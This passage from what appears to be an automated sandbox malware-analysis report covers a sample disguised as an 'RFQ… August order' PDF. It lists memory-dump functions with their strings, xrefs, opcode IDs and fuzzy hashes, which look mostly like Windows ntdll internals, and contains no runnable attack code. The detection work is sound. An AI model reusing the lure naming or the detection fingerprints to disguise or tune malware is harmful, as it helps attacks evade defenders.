Instruction Fuzzy Hash: 1C41D132A042519FCBA1CE69DC40A367BE9BF49A50F0605ADED899B311FB30D890CB91

Function 015E0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01635431
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01635449
HEAP: , xrefs: 0163543E

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: bbc76f7c54d38fe40ccb1852f0048564f3083b4c6a99a55eb9c29338be8b0a0e
Instruction ID: fb7f33284b4ebc763a3fc3cc2ffea102ae320e9ece0320f55612c2fdb55175f9
Opcode Fuzzy Hash: bbc76f7c54d38fe40ccb1852f0048564f3083b4c6a99a55eb9c29338be8b0a0e
Instruction Fuzzy Hash: FF1189317561429FDB2DCA18CC59B6AB3E9FF80B16F18812DF4068F292DB74E842C755

Function 016520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01652104
Process initialization failed with status 0x%08lx, xrefs: 016520F3
LdrpInitializationFailure, xrefs: 016520FA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 34284f054ff1c330d44915f1ff129c765430bbc7ab47b157b53e0424fd008b3e
Instruction ID: d4d61b9c9c5626ce36b80ee66afb12afbb4c36a89fdb361351aae689ffcec541
Opcode Fuzzy Hash: 34284f054ff1c330d44915f1ff129c765430bbc7ab47b157b53e0424fd008b3e
Instruction Fuzzy Hash: 1FF0FF34640308AFE720E64CDC96FEA3B68FB40B44F14001CFB006B285D2A0A9508AA4

Function 015E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01634D8A

Strings

#%u, xrefs: 01634D82

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 4ac932cbcfcdb4e8e5c570e960ecc5a1d2400739119ac5f68367995be8899659
Instruction ID: a13b33bd23189430934764a026c8ff0af6f6da9311d16bd1e77aa0e2728bc652
Opcode Fuzzy Hash: 4ac932cbcfcdb4e8e5c570e960ecc5a1d2400739119ac5f68367995be8899659
Instruction Fuzzy Hash: C8713872E0014A9FDB05DFA8CD94BAEBBF8BF48744F144069E905AB251EB34ED01CB64

Function 015DA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 015DAA25
LdrResSearchResource Enter, xrefs: 015DAA13

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 80618d39b5e087790172b59a904bdea94effde7b08a28cf75181eb7bc7915c7a
Instruction ID: 3a9a097a116e6e5fe643da51e25e22041630e072e100346f9a7240e0a4cff2dc
Opcode Fuzzy Hash: 80618d39b5e087790172b59a904bdea94effde7b08a28cf75181eb7bc7915c7a
Instruction Fuzzy Hash: 37E14E71E00219AFEB22CF9DCD90BAEBBBABF84310F14452AE901EB351D7749941CB51

Function 0169A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0169A44B
`, xrefs: 0169A551

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 402b83c38501041fc4a692c998fcc5fd74af98bf3283eb634d265a84f46c567f
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 25C1BD312043429BEB25CF68CC45B6BBBEAAFC4718F184A2DF696CB290D774D505CB81

Function 0164E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0164E751
Legacy, xrefs: 0164E75A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: b3e7a34462924fb22b1b127b97b0a52e8335305794332089f19781f5ebdac9cc
Instruction ID: 7f6933957e709f82713fcef6407b2b793c8fa995afb8d76b83874a451e0ecd4e
Opcode Fuzzy Hash: b3e7a34462924fb22b1b127b97b0a52e8335305794332089f19781f5ebdac9cc
Instruction Fuzzy Hash: 7E614C71E006199FEB15DFA8CC80BAEBBB9FF44700F15446EE649EB251D736A901CB50

Function 016743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01674525
@, xrefs: 01674437

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: d280d2002ae20d41f90098efc4d8ffd2edf14c0fa89e96ac43136e2f6b3c44ce
Instruction ID: 406926e6b38be6ec93e4bcbefc3e524d567a5d6c037f626d9436a5dfa3593193
Opcode Fuzzy Hash: d280d2002ae20d41f90098efc4d8ffd2edf14c0fa89e96ac43136e2f6b3c44ce
Instruction Fuzzy Hash: 40510971E0021EAEEB11DFA9CC94AEEBBB9FB44754F140529E615B7290EB309905CB60

Function 015D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015D063D
kLsE, xrefs: 015D0540

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 415a46cfe549cc23e24a4d6eddeb3ffb580b6953870309e57c4455166efd18cc
Instruction ID: aaa9729e94dd991c79246414c8e6f6bd1663a9b6acf15f137108d8134edb2ed4
Opcode Fuzzy Hash: 415a46cfe549cc23e24a4d6eddeb3ffb580b6953870309e57c4455166efd18cc
Instruction Fuzzy Hash: 9551AC715047428FD734EF2CC4446ABBBE4BF85304F14483EEA9A8B281E770D545CBA2

Function 015DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 015DA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 015DA309

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: cfb947df219cdbfff7c82b4ab1111fa1a5933a09d8ee11b8fc06a22d7e943cbf
Instruction ID: 80614b7bdc772418a25995f058fccd1effb81503ed9f4cd55676dacf27debf4b
Opcode Fuzzy Hash: cfb947df219cdbfff7c82b4ab1111fa1a5933a09d8ee11b8fc06a22d7e943cbf
Instruction Fuzzy Hash: E3417630A0464ADBDB29CF6DC890B6EBBB5BF85704F2444A9E901DF291EBB5D900CB50

Function 0160A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0160A5E9
Cleanup Group, xrefs: 0160A5E4

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 5cd1d554b5894c5285a88d2c25a0c51df11403c6ee4fc8fbeb7fe3cd59e68dfd
Instruction ID: fa332cc1ff9834ad2caea81e4bc88789375ac7671a133307473089a5b2c11c94
Opcode Fuzzy Hash: 5cd1d554b5894c5285a88d2c25a0c51df11403c6ee4fc8fbeb7fe3cd59e68dfd
Instruction Fuzzy Hash: 8B01D1B2260700AFD312DF54CD55F2677F8E785755F04893DA648CB290E374D804CB4A

Function 015DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 015DC8C3, 015DCA40

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: f7c3154eb0c3072f392e7bb09de0386ddadc95ef849f43b2839d5c05d1633d5d
Instruction ID: a8909bccfe9fc2b86eafa7d8e9061fdadb1a5e3c4b583c6e9fdc7c7dbccff300
Opcode Fuzzy Hash: f7c3154eb0c3072f392e7bb09de0386ddadc95ef849f43b2839d5c05d1633d5d
Instruction Fuzzy Hash: 4C823975E002598BEB35CFADC880BEDBBB5BF48310F148169E959AF391DB709981CB50

Function 01656420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 016565C1

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6105904c2b98601f28fc5f7d50397578a6e19ef7b4b01ee7b39ce37e99b34208
Instruction ID: 22209e6821cd249604adc680a92496fa4125d942b7f5bdb6b2aebaae02e6d900
Opcode Fuzzy Hash: 6105904c2b98601f28fc5f7d50397578a6e19ef7b4b01ee7b39ce37e99b34208
Instruction Fuzzy Hash: F2916072A4121AAFEB21DF95CC85FAE7BB8FF54750F500059FB01AB290D774A900CBA0

Function 0167E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0167E1FA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7d3d0ef091b36fe0705b727de40725fd4dc81777ab9e6900ce3c963ede67f763
Instruction ID: f555474e419a6aefc2c5dc4a71c0bfc6a663dd81c9b163aa07dfc517806f6224
Opcode Fuzzy Hash: 7d3d0ef091b36fe0705b727de40725fd4dc81777ab9e6900ce3c963ede67f763
Instruction Fuzzy Hash: 3991D371900606BFDB26AFA4DC44FAFBBBAFF85750F000069F515A7250DB369905CB50

Function 0160A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 016467C9

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 105e15a1662bd01f7bc09cc1845c81fa309651f8c570c10cabc49330757e7d06
Instruction ID: 564ff6b549f6eeb40bbbff72a2ce43e164b5c845bf941577b22350874847d338
Opcode Fuzzy Hash: 105e15a1662bd01f7bc09cc1845c81fa309651f8c570c10cabc49330757e7d06
Instruction Fuzzy Hash: F9716EB5E0021ADFEF28CF9CD9906ADBBB1BF89754F14812EE505AB341E7319941CB60

Function 01674978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01674A7F

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 4cb2629b04e84fc1a5e09c29e6494b10e64299dad0901b7e14ba17dd60232107
Instruction ID: 021dab8d6e31096e3f14a118f0ad7b4a44ecedbc0a9aff0532d448402078eb9e
Opcode Fuzzy Hash: 4cb2629b04e84fc1a5e09c29e6494b10e64299dad0901b7e14ba17dd60232107
Instruction Fuzzy Hash: AB519472D0022A9BDB15EF99DC48AAEBBB4BF54A10F05416AED11BB354DB349C01CBE4

Function 015EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 015EE6A4

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: a5b848e79818e0d678388734c24be606c02576a656c00f3d75fdce497c39c191
Instruction ID: 73e79b5e8900ed2ead130db56cde48e154edf25815031b8615e31811c6587ecc
Opcode Fuzzy Hash: a5b848e79818e0d678388734c24be606c02576a656c00f3d75fdce497c39c191
Instruction Fuzzy Hash: 8541EF729683529BD718DA78D849B6FBBE8FFC8704F04092DFA84DB180E674D904C796

Function 0164C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0164C77F

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 157b99d5ea2fb2d8543ffb8d75079a4af0e222ef4231ea9c57e7f16ec1220603
Instruction ID: 5cb63e295e840f45e5db60f3eb16cac999be3b77937c2995baf2e6946b4189ae
Opcode Fuzzy Hash: 157b99d5ea2fb2d8543ffb8d75079a4af0e222ef4231ea9c57e7f16ec1220603
Instruction Fuzzy Hash: CC4145B1D0152DAFDB21DA60CC84FDEB77DAB44714F0145E9EA08AB240DB709E89CF98

Function 01666B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01666B91

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7ccf7b5eb591476514fad241225672178b80cbc4f6a03668733f7cb29e6f5054
Instruction ID: 53f648b12dc243cd5b43ad1445735f01f80d405d5bcc2d5ef5944d0e2d462a88
Opcode Fuzzy Hash: 7ccf7b5eb591476514fad241225672178b80cbc4f6a03668733f7cb29e6f5054
Instruction Fuzzy Hash: 9C312631E00B099FEB22CB69DC50BAE7BACEF44704F144068E941AB286DB75EC15CB94

Function 0164CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0164CAA2

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 41febc79d2b34ed635cfef6d86a3d10f9586412ddde56c5c146f64894e04b130
Instruction ID: 5e8b081b6f9654cfd4e1e9613fb3d6e62e1d6857e2b019a6896852ac10a3480a
Opcode Fuzzy Hash: 41febc79d2b34ed635cfef6d86a3d10f9586412ddde56c5c146f64894e04b130
Instruction Fuzzy Hash: F731313690251AAFEB16CA59CC54EAFBBB4FF80720F014069E905AB350D7309E00DBE0

Function 0165892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0165895E

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 164d8d34a53240cfa0b06e11d762e6787f98b59b7fce782a60ee669f996d5d77
Instruction ID: 7de541ab1334f7e9c1a207f1127c818381ec61bd4b38c82b47e337dce9791d41
Opcode Fuzzy Hash: 164d8d34a53240cfa0b06e11d762e6787f98b59b7fce782a60ee669f996d5d77
Instruction Fuzzy Hash: 9401F7313102129FE7745E5F8C84A767BBAFFC5794F04101CFA421BA51CB206841C796

Function 01672000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb080cf4bfa50a8053e8860ffb9a088d8b1eae5507c2821c3d91587945c8d0d
Instruction ID: 3f4214a501a697ad94536fd36d502da6bf8c90f984a4282d6a3f5f1d834a0111
Opcode Fuzzy Hash: 4bb080cf4bfa50a8053e8860ffb9a088d8b1eae5507c2821c3d91587945c8d0d
Instruction Fuzzy Hash: C342D1726083419FE725CF68CCA0A6BBBE5BF88700F19492EFA8697350D731D945CB52

Function 01668158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafb10c09c1e0b7924b78642c9edcd8a0053d67effa9ac6fa521973812b351ed
Instruction ID: 41822fe19af11f07f40c2a44f5c6341e4de67959d5263823bf3b5fd29e57c9fd
Opcode Fuzzy Hash: aafb10c09c1e0b7924b78642c9edcd8a0053d67effa9ac6fa521973812b351ed
Instruction Fuzzy Hash: 3D422A75A103199FEB24CF69CC81BADBBF9BF88300F158199E949EB242D7349985CF50

Function 015E2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7650543fa8682e247ec86c80aec8db3e4b83f4b29f44bb2bb67f6561ba2826d
Instruction ID: 40991c773750b7e973171abac1c007b82d56db90a705fd300b3019bb23fc66ea
Opcode Fuzzy Hash: c7650543fa8682e247ec86c80aec8db3e4b83f4b29f44bb2bb67f6561ba2826d
Instruction Fuzzy Hash: 1732BB70A00756ABEB29CF69CC447BEBBF6BF84304F24811DD5869B385D735AA42CB50

Function 0167A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb7cd549ad28fc43ed39f32112c0ac2f1e299fee3d255cc66982f006263e44a3
Instruction ID: bd77aad5dc70223c45ab37015eeb4ea236569752c1369a44e34c754f52b0b977
Opcode Fuzzy Hash: fb7cd549ad28fc43ed39f32112c0ac2f1e299fee3d255cc66982f006263e44a3
Instruction Fuzzy Hash: AD22C1742046618FEB25CFADC89437ABBF1AF44300F1C8599E9968F386E735D492CB61

Function 015D6A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4539cbbaf12c6b29993855e4f310aa546b137f0c7710acab8946577f15cf4715
Instruction ID: ff0aa990c6965bd93de0ae21316ed79e54e8fffced9df4c4084e58d4e527393a
Opcode Fuzzy Hash: 4539cbbaf12c6b29993855e4f310aa546b137f0c7710acab8946577f15cf4715
Instruction Fuzzy Hash: 05326B71A05215CFDB25CF6CC880AAEBBF1FF88310F148569E956AB391D774E842CB91

Function 015F4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: e41cf60b1f53f8aa3e78547917bc1e8de6ee0b8d41c2d0d22b43139602c47ab1
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: FDF13C71E0021A9BDB15CF99D980BAEBBF5BF88710F09856DEA05EB341E774D841CB60

Function 0166892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d5350dc47a1c7d8a4ee8bfd73f0bdea35bf9c5d144f4652ae5ab5a37a618f77
Instruction ID: 84fc1f5ab52be007947ee45a990bf57075841fee66fb499f7a847bddcbfc1a87
Opcode Fuzzy Hash: 6d5350dc47a1c7d8a4ee8bfd73f0bdea35bf9c5d144f4652ae5ab5a37a618f77
Instruction Fuzzy Hash: C8D1C072E0070A9BDF15CF69CC41ABEB7FEBF88304F188169D955A7241E735E9068B60

Function 015D65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f87a5a698f526fc6c00acdd6b2d93425f6fb2e7c6391e04985fcd449682fd2e7
Instruction ID: a5d6985b40b8b67a67f504d61b4a185631f4a01dc9ddcb517b4634b422f2d5cf
Opcode Fuzzy Hash: f87a5a698f526fc6c00acdd6b2d93425f6fb2e7c6391e04985fcd449682fd2e7
Instruction Fuzzy Hash: 09E17F71508342CFC725CF2CC590A6ABBE1FF89314F05896DE9998B351DB31E946CB92

Function 015C8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ddd2be5a25ca547c3959f5f42b8612263991816d73f90f148dc8546cde1ee1
Instruction ID: 04adcca6022f1fff4e1cf765e0e45e62b74f879e42b4361fec1e85c7074eb404
Opcode Fuzzy Hash: 59ddd2be5a25ca547c3959f5f42b8612263991816d73f90f148dc8546cde1ee1
Instruction Fuzzy Hash: D0D1B171A006269FDB24DFA8CC90ABEB7E5FF94B04F04462DE9169F280E734E955CB50

Function 01658243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 7d20a0bdc503d1cb23830bc91a302f2f33eca050462f7636a908fab32064c0a7
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 85B18374A006059FDB64DF9ACD40AABBBBEBF84344F10845DAE4297B91DB34E906CB50

Function 015E0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 0a5ca3e9242c62c40f59508265bfe5645af5786e043cbcd9d8ee1b86eb43c968
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: D5B1E531B006469FDB19DBA8CC54BBEFBF6BF84200F284599E5529B385DB70D941CB90

Function 015D83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1949f111ed0ca27d14aca48152e7a0d2b151c6d21e836d71630fdb9b94b37bdb
Instruction ID: 2308070ee60aa8d7f2470d4db91006fb8407e2efb574d0adfc729676e020996d
Opcode Fuzzy Hash: 1949f111ed0ca27d14aca48152e7a0d2b151c6d21e836d71630fdb9b94b37bdb
Instruction Fuzzy Hash: F5C157741083419FD764CF19C884BAABBE5FF88304F44496DE9898B391E775E908CF92

Function 015CC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 364a69e58c81bdd258812143276832c663fb113fd434a1c768f34b4ee42c8a05
Instruction ID: 3f1aba1c37627a4c1e029ea93038aa2ffcc89c12decc01d9b508dbc5499cb2a3
Opcode Fuzzy Hash: 364a69e58c81bdd258812143276832c663fb113fd434a1c768f34b4ee42c8a05
